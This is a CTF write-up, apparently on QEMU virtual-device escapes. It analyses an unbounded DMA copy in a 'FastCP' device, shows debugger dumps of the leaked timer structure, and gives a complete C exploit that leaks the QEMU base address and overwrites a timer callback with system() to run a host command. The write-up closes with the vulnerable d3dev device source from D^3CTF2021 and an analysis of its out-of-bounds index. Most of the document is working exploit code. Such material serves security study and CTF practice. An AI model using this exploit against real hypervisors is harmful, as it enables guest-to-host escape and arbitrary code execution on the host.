        fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST | FASTCP_CMD_PULL |
                                            FASTCP_CMD_PUSH);
        s->handling = 0;
        return;
    }
    break;
}
case FASTCP_CMD_LIST: {
    uint64_t cnt = s->cp_state.CP_list_cnt;
    s->handling = 1;
    if (cnt > 0x10) {
        uint64_t i = 0;
        do {
            FastCP_CP_INFO item;
            cpu_physical_memory_rw(s->cp_state.CP_list_src + sizeof(FastCP_CP_INFO) * i,
                                   &item, sizeof(FastCP_CP_INFO), 0);
            /* item.CP_cnt is used without any bound, in both directions. */
            cpu_physical_memory_rw(item.CP_src, s->CP_buffer, item.CP_cnt, 0);
            cpu_physical_memory_rw(item.CP_dst, s->CP_buffer, item.CP_cnt, 1);
            i++;
        } while (s->cp_state.CP_list_cnt > i);
    } else {
    }
    fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST);
    s->handling = 0;
    return;
}
```
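cpu_physical_memory_rw() in QEMU performs a byte-wise read or write transfer on the system physical address space (address_space_memory). It is typically used when an emulated device performs DMA, copying guest physical memory into a local QEMU buffer or the other way round. A typical declaration (nearly identical across versions):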
```c
void cpu_physical_memory_rw(hwaddr addr, void *buf, hwaddr len, int is_write);

static inline void cpu_physical_memory_read(hwaddr addr, void *buf, hwaddr len)
{
    cpu_physical_memory_rw(addr, buf, len, 0);
}

static inline void cpu_physical_memory_write(hwaddr addr, const void *buf, hwaddr len)
{
    cpu_physical_memory_rw(addr, (void *)buf, len, 1);
}
```
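Parameters:
addr: a guest physical address (GPA), not a virtual address or a device address.
buf: a host pointer inside the QEMU process.
len: the number of bytes; internally the function may split the transfer into several accesses at the granularity the target accepts (1/2/4/8 bytes, and so on).
is_write: 0 copies from guest to host, 1 copies from host to guest.
It is only a thin wrapper that forwards directly to: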
```c
address_space_rw(&address_space_memory, addr,
                 MEMTXATTRS_UNSPECIFIED, buf, len, is_write);
```
In other words, it always targets the system physical address space and always uses the default transaction attributes MEMTXATTRS_UNSPECIFIED.
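The out-of-bounds read leaks the QEMUTimer that follows CP_buffer: its timer_list pointer (a heap address) and its cb pointer (fastcp_cp_timer, an address inside the QEMU binary).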
pwndbg> u 1
0x5555558dd0d7 <fastcp_cp_timer+599> mov ecx , 1 ECX => 1
► 0x5555558dd0dc <fastcp_cp_timer+604> call cpu_physical_memory_rw <cpu_physical_memory_rw >
rdi : 0x51e8000
rsi : 0x5555572d2ec0 ◂— 0
rdx : 0x1040
rcx : 1
0x5555558dd0e1 <fastcp_cp_timer+609> mov rax , qword ptr [ rbx + 0x9f0 ]
pwndbg> telescope 0x5555572d2ec0+0x1000
00:0000│ 0x5555572d3ec0 ◂— 0xffffffffffffffff
01:0008│ 0x5555572d3ec8 —▸ 0x5555565fa6e0 —▸ 0x5555563b0db0 (qemu_clocks+16) —▸ 0x5555565fab10 ◂— 0x5555563b0db0 (qemu_clocks+16)
02:0010│ 0x5555572d3ed0 —▸ 0x5555558dce80 (fastcp_cp_timer) ◂— push r13
03:0018│ 0x5555572d3ed8 —▸ 0x5555572d24c0 —▸ 0x55555642c220 —▸ 0x555556402060 —▸ 0x5555564021e0 ◂— ...
04:0020│ 0x5555572d3ee0 ◂— 0
05:0028│ 0x5555572d3ee8 ◂— 0xf424000000000
06:0030│ 0x5555572d3ef0 ◂— 0
07:0038│ 0x5555572d3ef8 ◂— 0x61 /* 'a' */
pwndbg> p *(QEMUTimer*)0x5555572d3ec0
$1 = {
expire_time = -1,
timer_list = 0x5555565fa6e0 ,
cb = 0x5555558dce80 <fastcp_cp_timer >,
opaque = 0x5555572d24c0 ,
next = 0x0 ,
attributes = 0,
scale = 1000000
}
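The dump above can be turned into a small parsing step. The following is a minimal sketch, not the author's code: it assumes the leak is a byte buffer that starts at CP_buffer, that the QEMUTimer begins 0x1000 bytes in, and that the field offsets match the pwndbg output. The names timer_leak and parse_timer_leak are hypothetical; the constants 0x4dce80 and 0x2c2180 are the build-specific offsets used in the exploit and hold only for this binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offsets read off the pwndbg dump; valid only for this QEMU build. */
enum {
    CP_BUFFER_SIZE   = 0x1000, /* distance from CP_buffer to the QEMUTimer */
    TIMER_LIST_OFF   = 0x08,   /* QEMUTimer.timer_list */
    TIMER_CB_OFF     = 0x10,   /* QEMUTimer.cb */
    TIMER_OPAQUE_OFF = 0x18    /* QEMUTimer.opaque */
};
#define FASTCP_CP_TIMER_OFF 0x4dce80ULL /* fastcp_cp_timer - image base */
#define SYSTEM_PLT_OFF      0x2c2180ULL /* system@plt - image base */

typedef struct {
    uint64_t timer_list; /* must be written back unchanged later */
    uint64_t cb;         /* leaked code pointer */
    uint64_t opaque;     /* pointer to the device state */
    uint64_t image_base; /* derived from cb */
    uint64_t system_plt; /* derived from image_base */
} timer_leak;

/* Read a 64-bit value without assuming the buffer is aligned. */
static uint64_t load_u64(const uint8_t *p)
{
    uint64_t v;
    memcpy(&v, p, sizeof v);
    return v;
}

/* Returns 0 on success, -1 if the leak is too short to contain the fields. */
int parse_timer_leak(const uint8_t *leak, size_t len, timer_leak *out)
{
    if (len < CP_BUFFER_SIZE + TIMER_OPAQUE_OFF + sizeof(uint64_t)) {
        return -1;
    }
    const uint8_t *t = leak + CP_BUFFER_SIZE;
    out->timer_list = load_u64(t + TIMER_LIST_OFF);
    out->cb         = load_u64(t + TIMER_CB_OFF);
    out->opaque     = load_u64(t + TIMER_OPAQUE_OFF);
    out->image_base = out->cb - FASTCP_CP_TIMER_OFF;
    out->system_plt = out->image_base + SYSTEM_PLT_OFF;
    return 0;
}
```

With the values from the session above, cb = 0x5555558dce80 gives an image base of 0x555555400000. The timer_list value is kept because the later overwrite has to restore it for the timer to stay usable.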
Full exploit

    #define _GNU_SOURCE
    #include <assert.h>
    #include <ctype.h>
    #include <errno.h>
    #include <fcntl.h>
    #include <limits.h>
    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <unistd.h>

    /* The first four constants are missing from the original listing; the values are assumptions. */
    #define HM_INIT_CAP 16  /* initial bucket count, must be a power of two */
    #define LOAD_NUM 3      /* grow at load factor LOAD_NUM / LOAD_DEN = 0.75 */
    #define LOAD_DEN 4
    #ifndef PAGE_SIZE
    #define PAGE_SIZE 0x1000
    #endif
    #define IORESOURCE_MEM 0x00000200ULL

    typedef struct hash_map_entry {
        uint64_t key, value;
        struct hash_map_entry* next;
    } hash_map_entry;

    typedef struct hash_map {
        hash_map_entry** entry;  // bucket array
        size_t cap;              // number of buckets (a power of two)
        size_t size;             // number of stored key/value pairs
    } hash_map;

    static inline uint64_t mix64(uint64_t x) {
        x ^= x >> 30;
        x *= 0xbf58476d1ce4e5b9ULL;
        x ^= x >> 27;
        x *= 0x94d049bb133111ebULL;
        x ^= x >> 31;
        return x;
    }

    static inline size_t idx_for(const hash_map* m, uint64_t key) {
        return (size_t)(mix64(key) & (m->cap - 1));  // cap must be a power of two
    }

    static void rehash(hash_map* m, size_t new_cap) {
        hash_map_entry** old = m->entry;
        size_t old_cap = m->cap;
        m->entry = (hash_map_entry**)calloc(new_cap, sizeof(*m->entry));
        m->cap = new_cap;
        for (size_t i = 0; i < old_cap; ++i) {
            for (hash_map_entry *e = old[i], *n; e; e = n) {
                n = e->next;
                size_t h = (size_t)(mix64(e->key) & (new_cap - 1));
                e->next = m->entry[h];
                m->entry[h] = e;
            }
        }
        free(old);
    }

    void hash_map_init(hash_map* m) {
        m->cap = HM_INIT_CAP;
        m->size = 0;
        m->entry = (hash_map_entry**)calloc(m->cap, sizeof(*m->entry));
    }

    uint64_t hash_map_get(hash_map* m, uint64_t key) {
        size_t h = idx_for(m, key);
        for (hash_map_entry* e = m->entry[h]; e; e = e->next) {
            if (e->key == key) return e->value;
        }
        return UINT64_MAX;  // not found; equals (uint64_t)-1
    }

    void hash_map_set(hash_map* m, uint64_t key, uint64_t value) {
        // double the capacity once the load factor reaches 0.75
        if ((m->size + 1) * LOAD_DEN >= m->cap * LOAD_NUM) {
            rehash(m, m->cap ? (m->cap << 1) : HM_INIT_CAP);
        }
        size_t h = idx_for(m, key);
        for (hash_map_entry* e = m->entry[h]; e; e = e->next) {
            if (e->key == key) {
                e->value = value;
                return;
            }
        }
        hash_map_entry* e = (hash_map_entry*)calloc(1, sizeof(*e));
        e->key = key;
        e->value = value;
        e->next = m->entry[h];
        m->entry[h] = e;
        m->size++;
    }

    void hash_map_del(hash_map* m, uint64_t key) {
        size_t h = idx_for(m, key);
        hash_map_entry *prev = NULL, *e = m->entry[h];
        while (e) {
            if (e->key == key) {
                if (prev) prev->next = e->next;
                else m->entry[h] = e->next;
                free(e);
                m->size--;
                return;
            }
            prev = e;
            e = e->next;
        }
    }

    void hash_map_clear(hash_map* m) {
        if (!m || !m->entry) return;
        for (size_t i = 0; i < m->cap; ++i) {
            for (hash_map_entry *e = m->entry[i], *n; e; e = n) {
                n = e->next;
                free(e);
            }
        }
        free(m->entry);
        m->entry = NULL;
        m->cap = m->size = 0;
    }

    /* Translate a virtual address through /proc/self/pagemap.
       Reading real PFNs requires root (CAP_SYS_ADMIN) on current kernels. */
    static uint64_t virt_to_phys(void* vaddr) {
        long pagesize = sysconf(_SC_PAGESIZE);
        uint64_t va = (uint64_t)vaddr;
        uint64_t page_index = va / pagesize;
        uint64_t offset = page_index * sizeof(uint64_t);
        int fd = open("/proc/self/pagemap", O_RDONLY);
        if (fd < 0) return 0;
        uint64_t entry = 0;
        ssize_t n = pread(fd, &entry, sizeof(entry), offset);
        close(fd);
        if (n != sizeof(entry)) return 0;
        if (!(entry & (1ULL << 63)) || (entry & (1ULL << 62))) {  // not present or swapped
            errno = EFAULT;
            return 0;
        }
        uint64_t pfn = entry & ((1ULL << 55) - 1);
        return (pfn * pagesize) + (va % pagesize);
    }

    typedef struct {
        void* vaddr[2];
        size_t paddr;
    } adjacent_pages_buf;

    void release_pages(hash_map* map) {
        // iterate over the actual bucket count, which changes after rehash()
        for (size_t i = 0; i < map->cap; i++) {
            for (hash_map_entry* entry = map->entry[i]; entry; entry = entry->next) {
                int rc = munmap((void*)entry->value, PAGE_SIZE);
                assert(rc == 0);
                (void)rc;
            }
        }
        hash_map_clear(map);
    }

    void get_adjacent_pages(adjacent_pages_buf* buf) {
        long pagesize = sysconf(_SC_PAGESIZE);
        hash_map* map = calloc(1, sizeof(*map));  // allocate the struct, not a pointer
        hash_map_init(map);
        while (true) {
            void* vaddr = mmap(NULL, pagesize, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS
| MAP_POPULATE, -1 , 0 ); size_t paddr = virt_to_phys(vaddr); printf("[*] new page %p %p\n" , paddr, vaddr); if ((buf->vaddr[1 ] = (void*)hash_map_get(map , paddr + pagesize)) != (void*)-1 ) { buf->vaddr[0 ] = (void*)vaddr; buf->paddr = paddr; hash_map_del(map , paddr + pagesize); release_pages(map ), free(map ); return ; } if ((buf->vaddr[0 ] = (void*)hash_map_get(map , paddr - pagesize)) != (void*)-1 ) { buf->vaddr[1 ] = (void*)vaddr; buf->paddr = paddr - pagesize; hash_map_del(map , paddr - pagesize); hash_map_clear(map ), free(map ); return ; } hash_map_set(map , paddr, (size_t)vaddr); } } void qword_dump(char* desc, void* addr, int len ) { uint64_t* buf64 = (uint64_t*)addr; uint8_t* buf8 = (uint8_t*)addr; if (desc != NULL) { printf("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf(" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf(" 0x%016lx" , buf64[i + j]) : printf(" " ); } printf(" " ); for (int j = 0 ; j < 32 && j + i * 8 < len ; j++) { printf("%c" , isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts("" ); } } typedef struct { volatile uint8_t* bar; // 映射后的虚拟基址 size_t size; // 资源真实大小(end - start + 1 ) size_t map_len; // 实际 mmap 的长度(按页对齐) int fd; // 打开的 /sys/.../resourceN int res_idx; // 选中的 resource 行号(BAR 号 0. 
.5 ) // 新增:物理信息 uint64_t phys_start; // 该映射对应的设备物理起始地址(BAR 起点) uint64_t phys_end; // 物理结束地址(含端点) unsigned long long res_flags; // resource 行里的 flags(可用于判断 WC 等) bool inited; } mmio_ctx_t; static mmio_ctx_t g_mmio = {0 }; /* --- 内部:把 BDF 或 /sys/.../resource 解析成两个路径 --- */ static int build_paths(const char* bdf_or_path, char* resource_txt, size_t txt_sz, char* dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr(bdf_or_path, '/' )) { /* 直接传了 /sys/.../resource 或 /sys/.../resourceN */ snprintf(resource_txt, txt_sz, "%s" , bdf_or_path); snprintf(dev_dir, dir_sz, "%s" , bdf_or_path); char* slash = strrchr(dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; // 如果传进来的是 resourceN,把它回退到目录再去拼 resource if (strstr(resource_txt, "/resource" ) && resource_txt[strlen(resource_txt) - 1 ] >= '0' && resource_txt[strlen(resource_txt) - 1 ] <= '9' ) { snprintf(resource_txt, txt_sz, "%s/resource" , dev_dir); } } else { /* 传的是 BDF */ snprintf(resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf(dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } /* --- 内部:解析 resource 文本,找内存型 BAR(或指定 BAR) --- */ static int parse_mem_bar(const char* resource_txt, int bar_idx, unsigned long long* start, unsigned long long* end, unsigned long long* flags, int * picked_idx) { FILE* fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof(line), fp)) { unsigned long long s = 0 , e = 0 , f = 0 ; if (sscanf(line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end 
= e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } /* --- 对外:初始化 / 映射 --- */ int mmio_init(const char* bdf_or_path, int bar_idx){ if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof(resource_txt), dev_dir, sizeof(dev_dir)) != 0 ) return -1 ; unsigned long long start = 0 , end = 0 , flags = 0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t)((end - start) + 1ULL); size_t pg = (size_t)sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf(res_path, sizeof(res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open (res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; // 对 MMIO,MAP_SHARED 必须;是否加 MAP_POPULATE 对 MMIO 不关键 void* map = mmap(NULL, map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t*)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t)start; g_mmio.phys_end = (uint64_t)end; g_mmio.res_flags = flags; g_mmio.inited = true; return 0 ; } void mmio_fini(void) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void*)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset(&g_mmio, 0 , sizeof(g_mmio)); } /* --- 查询(虚拟信息) --- */ volatile void* mmio_base(void) { return g_mmio.bar; } size_t mmio_size(void) { return g_mmio.size; } int mmio_bar_index(void) { return g_mmio.res_idx; }/* --- 查询(物理信息) --- */ uint64_t mmio_phys_base(void) { return g_mmio.phys_start; } uint64_t mmio_phys_limit(void) { return g_mmio.phys_end; } // inclusive /* off -> 设备物理地址(范围检查) */ uint64_t mmio_offset_to_phys(size_t off) { if (!g_mmio.inited) { errno = 
EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t)off; } /* VA(映射内某指针) -> 设备物理地址(范围检查) */ uint64_t mmio_virt_to_phys(const void* p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t)g_mmio.bar; uintptr_t addr = (uintptr_t)p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t)(addr - base); return g_mmio.phys_start + (uint64_t)off; } /* --- 内部:范围检查 --- */ static inline int chk(size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } /* --- 读写 API(按天然宽度访问;PCI 寄存器通常小端) --- */ uint8_t mmio_read8(size_t off) { if (chk(off, 1 )) return 0 ; return *(volatile uint8_t*)(g_mmio.bar + off); } uint16_t mmio_read16(size_t off) { if (chk(off, 2 )) return 0 ; return *(volatile uint16_t*)(g_mmio.bar + off); } uint32_t mmio_read32(size_t off) { if (chk(off, 4 )) return 0 ; return *(volatile uint32_t*)(g_mmio.bar + off); } uint64_t mmio_read64(size_t off) { if (chk(off, 8 )) return 0 ; return *(volatile uint64_t*)(g_mmio.bar + off); } void mmio_write8(size_t off, uint8_t v) { if (chk(off, 1 )) return ; *(volatile uint8_t*)(g_mmio.bar + off) = v; } void mmio_write16(size_t off, uint16_t v) { if (chk(off, 2 )) return ; *(volatile uint16_t*)(g_mmio.bar + off) = v; } void mmio_write32(size_t off, uint32_t v) { if (chk(off, 4 )) return ; *(volatile uint32_t*)(g_mmio.bar + off) = v; } void mmio_write64(size_t off, uint64_t v) { if (chk(off, 8 )) return ; *(volatile uint64_t*)(g_mmio.bar + off) = v; } /* 返回映射内某 offset 的可直接访问指针 */ volatile void* mmio_ptr(size_t off) { if (chk(off, 1 )) return NULL; return (volatile void*)(g_mmio.bar + off); } enum { SRC = 0x08 , CNT = 0x10 , CMD = 0x18 }; typedef struct { size_t CP_src; size_t CP_cnt; size_t CP_dst; } CP_info; int main(){ mmio_init("0000:00:04.0" , 0 ); adjacent_pages_buf read_buf; 
        get_adjacent_pages(&read_buf);
        printf("[+] read_buf vaddr[0]: %p\n", read_buf.vaddr[0]);
        printf("[+] read_buf vaddr[1]: %p\n", read_buf.vaddr[1]);
        printf("[+] read_buf paddr: %p\n", (void*)read_buf.paddr);
        adjacent_pages_buf write_buf;
        get_adjacent_pages(&write_buf);
        printf("[+] write_buf vaddr[0]: %p\n", write_buf.vaddr[0]);
        printf("[+] write_buf vaddr[1]: %p\n", write_buf.vaddr[1]);
        printf("[+] write_buf paddr: %p\n", (void*)write_buf.paddr);

        /* Stage 1: one descriptor, CP_cnt = 0x1040, so the device copies 0x40 bytes
           beyond CP_buffer into the second page of read_buf. */
        (*(CP_info*)write_buf.vaddr[0]).CP_dst = read_buf.paddr;
        (*(CP_info*)write_buf.vaddr[0]).CP_cnt = 0x1040;
        mmio_write64(SRC, write_buf.paddr);
        mmio_write64(CNT, 1);
        mmio_write64(CMD, 0x4);
        sleep(1);
        qword_dump(NULL, read_buf.vaddr[1], 0x40);

        /* The leaked bytes are the QEMUTimer: timer_list at +0x08, cb at +0x10, opaque at +0x18. */
        size_t timer_list_addr = *(size_t*)((char*)read_buf.vaddr[1] + 0x08);
        size_t qemu_base = *(size_t*)((char*)read_buf.vaddr[1] + 0x10) - 0x4dce80;
        printf("[+] elf base: %p\n", (void*)qemu_base);
        size_t system_plt = qemu_base + 0x2c2180;
        printf("[*] system@plt: %p\n", (void*)system_plt);
        size_t opaque_addr = *(size_t*)((char*)read_buf.vaddr[1] + 0x18);
        printf("[+] opaque addr: %p\n", (void*)opaque_addr);

        /* Stage 2: 0x11 descriptors take the list path; each copies 0x1020 bytes
           from write_buf into CP_buffer, overwriting the start of the QEMUTimer. */
        for (int i = 0; i < 0x11; i++) {
            ((CP_info*)write_buf.vaddr[0])[i].CP_src = write_buf.paddr;
            ((CP_info*)write_buf.vaddr[0])[i].CP_dst = read_buf.paddr;
            ((CP_info*)write_buf.vaddr[0])[i].CP_cnt = 0x1020;
        }
        /* Forged timer: keep timer_list, cb = system, opaque = address of the command
           string (CP_buffer is at opaque + 0xa00, the string at offset 0x500 in it). */
        *(size_t*)((char*)write_buf.vaddr[1] + 0x8) = timer_list_addr;
        *(size_t*)((char*)write_buf.vaddr[1] + 0x10) = system_plt;
        *(size_t*)((char*)write_buf.vaddr[1] + 0x18) = opaque_addr + 0xa00 + 0x500;
        char cmd[] = "/usr/bin/gnome-calculator";
        memcpy((char*)write_buf.vaddr[0] + 0x500, cmd, sizeof(cmd));
        mmio_write64(SRC, write_buf.paddr);
        mmio_write64(CNT, 0x11);
        mmio_write64(CMD, 0x1);
        sleep(1);

        /* One more command; presumably this re-arms the timer so the forged callback fires. */
        mmio_write64(CMD, 0x114514);
        return 0;
    }
D^3CTF2021 d3dev
Vulnerability analysis

    #include "qemu/osdep.h"
    #include "qemu/module.h"
    #include "qapi/error.h"
    #include "qom/object.h"
    #include "exec/memory.h"
    #include "hw/pci/pci.h"
    #include <time.h>
    #include <stdlib.h>
    #include <stdint.h>

    #define TYPE_D3DEV "d3dev"
    OBJECT_DECLARE_SIMPLE_TYPE(struct d3devState, D3DEV)

    struct d3devState {
        PCIDevice pdev;
        MemoryRegion mmio;
        MemoryRegion pmio;
        uint32_t memory_mode;
        uint32_t seek;
        uint32_t init_flag;
        uint32_t mmio_read_part;
        uint32_t mmio_write_part;
        uint32_t r_seed;
        uint64_t blocks[0x101];
        uint32_t key[4];
        int (*rand_r)(uint32_t *);
    };

    static inline void tea_encrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
    {
        uint32_t sum = 0;
        do {
            sum -= 0x61C88647U;
            *lw += (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
            *hi += (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
        } while (sum != 0xC6EF3720U);
    }

    static inline void tea_decrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
    {
        uint32_t sum = 0xC6EF3720U;
        do {
            *hi -= (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
            *lw -= (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
            sum += 0x61C88647U;
        } while (sum != 0);
    }

    static uint64_t d3dev_mmio_read(void *opaque, hwaddr addr, unsigned int size)
    {
        struct d3devState *s = (struct d3devState *)opaque;
        /* No bounds check: seek (up to 0x100) + addr / 8 (up to 0xFF) can exceed index 0x100. */
        uint64_t blk = s->blocks[s->seek + ((unsigned int)(addr) >> 3)];
        uint32_t lw = (uint32_t)blk;
        uint32_t hi = (uint32_t)(blk >> 32);

        tea_decrypt_64(&lw, &hi, s->key);

        if (s->mmio_read_part) {
            s->mmio_read_part = 0;
            return (uint64_t)hi;
        } else {
            s->mmio_read_part = 1;
            return (uint64_t)lw;
        }
    }

    static void d3dev_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
    {
        struct d3devState *s = (struct d3devState *)opaque;

        if (size != 4) {
            return;
        }

        /* Same unchecked index as in d3dev_mmio_read. */
        size_t idx = s->seek + ((unsigned int)(addr) >> 3);

        if (s->mmio_write_part) {
            uint32_t lw = (uint32_t)s->blocks[idx];
            uint32_t hi = (uint32_t)((s->blocks[idx] >> 32) + val);
            tea_encrypt_64(&lw, &hi, s->key);
            s->blocks[idx] = ((uint64_t)hi << 32) | lw;
            s->mmio_write_part = 0;
        } else {
            s->blocks[idx] = (uint32_t)val;
            s->mmio_write_part = 1;
        }
    }

    static uint64_t d3dev_pmio_read(void *opaque, hwaddr addr, unsigned int size)
    {
        struct d3devState *s = (struct d3devState *)opaque;
        switch (addr) {
        case 0x00: return s->memory_mode;
        case 0x08: return s->seek;
        case 0x0C: return s->key[0];
        case 0x10: return s->key[1];
        case 0x14: return s->key[2];
        case 0x18: return s->key[3];
        default:   return (uint64_t)-1;
        }
    }

    static void d3dev_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
    {
        struct d3devState *s = (struct d3devState *)opaque;
        switch (addr) {
        case 0x00:
            s->memory_mode = (uint32_t)val;
            break;
        case 0x04:
            memset(s->key, 0, sizeof(s->key));
            break;
        case 0x08:
            /* seek == 0x100 is accepted. */
            if (val <= 0x100) {
                s->seek = (uint32_t)val;
            }
            break;
        case 0x1C:
            s->r_seed = (uint32_t)val;
            {
                uint32_t *p = s->key;
                do {
                    *p++ = (uint32_t)s->rand_r(&s->r_seed);
                } while (p != (uint32_t *)&s->rand_r);
            }
            break;
        default:
            break;
        }
    }

    static const MemoryRegionOps d3dev_mmio_ops = {
        .read = d3dev_mmio_read,
        .write = d3dev_mmio_write,
        .endianness = DEVICE_NATIVE_ENDIAN,
    };

    static const MemoryRegionOps d3dev_pmio_ops = {
        .read = d3dev_pmio_read,
        .write = d3dev_pmio_write,
        .endianness = DEVICE_LITTLE_ENDIAN,
    };

    static void pci_d3dev_realize(PCIDevice *pdev, Error **errp)
    {
        struct d3devState *s = D3DEV(pdev);

        memory_region_init_io(&s->mmio, OBJECT(pdev), &d3dev_mmio_ops, s, "d3dev-mmio", 0x800);
        pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);

        memory_region_init_io(&s->pmio, OBJECT(pdev), &d3dev_pmio_ops, s, "d3dev-pmio", 0x20);
        pci_register_bar(pdev, 1, PCI_BASE_ADDRESS_SPACE_IO, &s->pmio);
    }

    static void d3dev_instance_init(Object *obj)
    {
        struct d3devState *s = D3DEV(obj);
        s->rand_r = rand_r;

        if (!s->init_flag) {
            unsigned i;
            srand((unsigned)time(NULL));
            for (i = 0; i < 4; ++i) {
                s->key[i] = (uint32_t)rand();
            }
            s->init_flag = 1;
        }
    }

    static void d3dev_class_init(ObjectClass *oc, void *data)
    {
        PCIDeviceClass *k = PCI_DEVICE_CLASS(oc);
        k->realize = pci_d3dev_realize;
        k->exit = NULL;
        k->vendor_id = 0x2333;
        k->device_id = 0x11E8;
        k->revision = 0x10;
        k->class_id = PCI_CLASS_OTHERS;
    }

    static const TypeInfo d3dev_info = {
        .name = TYPE_D3DEV,
        .parent = TYPE_PCI_DEVICE,
        .instance_size = sizeof(struct d3devState),
        .instance_init = d3dev_instance_init,
        .class_init = d3dev_class_init,
    };

    static void pci_d3dev_register_types(void)
    {
        type_register_static(&d3dev_info);
    }

    type_init(pci_d3dev_register_types);
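The device indexes the blocks array, whose elements are uint64_t, with seek + addr / 8. blocks has 0x101 elements.
The MMIO region is registered with size 0x800, so addr must be below 0x800, which means addr / 8 < 0x100.
When seek is set, the only check is that it is less than or equal to 0x100.
Setting seek to 0x100 therefore gives an out-of-bounds read and write: the index can reach 0x100 + 0xFF = 0x1FF, well past the last valid index 0x100.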
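The index arithmetic can be checked with a short sketch. The struct d3dev_tail below is a hypothetical mirror of the d3devState fields from memory_mode onwards; it assumes a 64-bit build and that memory_mode is 8-byte aligned in the real struct, so that no padding appears before blocks. The helper names are illustrative and not part of the device.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the tail of d3devState (assumes LP64, no padding). */
typedef struct {
    uint32_t memory_mode;
    uint32_t seek;
    uint32_t init_flag;
    uint32_t mmio_read_part;
    uint32_t mmio_write_part;
    uint32_t r_seed;
    uint64_t blocks[0x101];
    uint32_t key[4];
    int (*rand_r)(uint32_t *);
} d3dev_tail;

enum { MMIO_SIZE = 0x800, SEEK_MAX = 0x100 };

/* Index the device computes for an MMIO access at offset addr. */
size_t block_index(uint32_t seek, uint64_t addr)
{
    return seek + ((unsigned int)addr >> 3);
}

/* Which blocks[] index aliases a field located at field_offset in the struct. */
size_t field_index(size_t field_offset)
{
    return (field_offset - offsetof(d3dev_tail, blocks)) / sizeof(uint64_t);
}

/* MMIO offset that reaches blocks[idx] for a given seek (requires idx >= seek). */
uint64_t mmio_addr_for_index(uint32_t seek, size_t idx)
{
    return (uint64_t)(idx - seek) * 8;
}
```

Under these assumptions key aliases blocks[0x101] and blocks[0x102], and rand_r aliases blocks[0x103], which with seek = 0x100 is reached at MMIO offset 0x18.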
The logic of d3dev_mmio_write is as follows:
    static void d3dev_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
    {
        struct d3devState *s = (struct d3devState *)opaque;

        if (size != 4) {
            return;
        }

        size_t idx = s->seek + ((unsigned int)(addr) >> 3);

        if (s->mmio_write_part) {
            uint32_t lw = (uint32_t)s->blocks[idx];
            uint32_t hi = (uint32_t)((s->blocks[idx] >> 32) + val);
            tea_encrypt_64(&lw, &hi, s->key);
            s->blocks[idx] = ((uint64_t)hi << 32) | lw;
            s->mmio_write_part = 0;
        } else {
            s->blocks[idx] = (uint32_t)val;
            s->mmio_write_part = 1;
        }
    }
When mmio_write_part == 0, the low 32 bits of val are zero-extended to 64 bits and written to blocks[seek + addr / 8].
